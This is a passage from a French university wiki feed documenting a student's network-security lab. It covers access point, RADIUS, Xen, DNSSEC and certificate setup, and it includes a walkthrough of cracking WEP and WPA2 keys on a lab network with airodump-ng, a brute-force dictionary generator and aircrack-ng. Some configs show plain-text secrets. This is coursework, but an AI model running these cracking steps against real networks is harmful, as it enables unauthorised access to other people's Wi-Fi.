&amp;lt;pre&amp;gt;&lt;br /&gt;
# ls&lt;br /&gt;
# aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
# gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# ./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
après quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23398</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23398"/>
				<updated>2015-11-27T14:13:21Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Sécurisation Wifi par WPA2-EAP&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès&amp;lt;/h3&amp;gt;&lt;br /&gt;
On commence par remettre le point d’accès en configuration d'usine &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#erase startup-config&lt;br /&gt;
ap#reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#line vty 0 15 &lt;br /&gt;
ap(config-line)#password ****&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip default-gateway 172.20.99.254&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface bvi 1 &lt;br /&gt;
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration de la machine virtuel&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe freeradius: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install FreeRadius&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On configure la conexion:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# nano eap.conf&lt;br /&gt;
// on remplace &lt;br /&gt;
default_eap_type = md5&lt;br /&gt;
// par&lt;br /&gt;
default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
# nano clients.conf &lt;br /&gt;
client 172.20.99.0/24 {&lt;br /&gt;
        secret          = topsecret&lt;br /&gt;
        shortname       = wifi&lt;br /&gt;
&lt;br /&gt;
# nano users &lt;br /&gt;
john    Cleartext-Password := &amp;quot;****&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# service freeradius restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du eeePc&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# /etc/ssh/sshd_config&lt;br /&gt;
# PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
# if down eth0 &lt;br /&gt;
# ifup etho&lt;br /&gt;
# apt-get purge network-manage systemd &lt;br /&gt;
# inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
# service bind9 stop&lt;br /&gt;
# service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Géneration d'une clés assymetrique:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE love-in-the-world.space&lt;br /&gt;
Generating key pair...........+++ ....................+++ &lt;br /&gt;
Klove-in-the-world.space.+005+14281&lt;br /&gt;
# mv Klove-in-the-world.space.+005+14281.key  love-in-the-world-ksk.key&lt;br /&gt;
# mv Klove-in-the-world.space.+005+14281.private  love-in-the-world-ksk.private&lt;br /&gt;
&lt;br /&gt;
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE love-in-the-world.space&lt;br /&gt;
Generating key pair........++++++ .....................++++++ &lt;br /&gt;
Klove-in-the-world.space.+005+37866&lt;br /&gt;
# mv Klove-in-the-world.space.+005+37866.key  love-in-the-world-zsk.key&lt;br /&gt;
# mv Klove-in-the-world.space.+005+37866.private  love-in-the-world-zsk.private&lt;br /&gt;
&lt;br /&gt;
# dnssec-signzone -o love-in-the-world.space -k love-in-the-world-ksk ../db.love-in-the-world love-in-the-world-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.love-in-the-world.signed&lt;br /&gt;
root@chien:/etc/bind/love-in-the-world# &lt;br /&gt;
&lt;br /&gt;
:/etc/bind# nano named.conf.local &lt;br /&gt;
zone &amp;quot;love-in-the-world.space&amp;quot;{&lt;br /&gt;
&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.love-in-the-world.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ensuite on copie le contenu du fichier:&lt;br /&gt;
dans gandi.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
on peut verifier que notre dns est secure a l'adresse suivante:&lt;br /&gt;
http://dnsviz.net/d/love-in-the-world.space/dnssec/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 # newaliases&lt;br /&gt;
 # mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#nano 000-domain.tld-ssl.conf&lt;br /&gt;
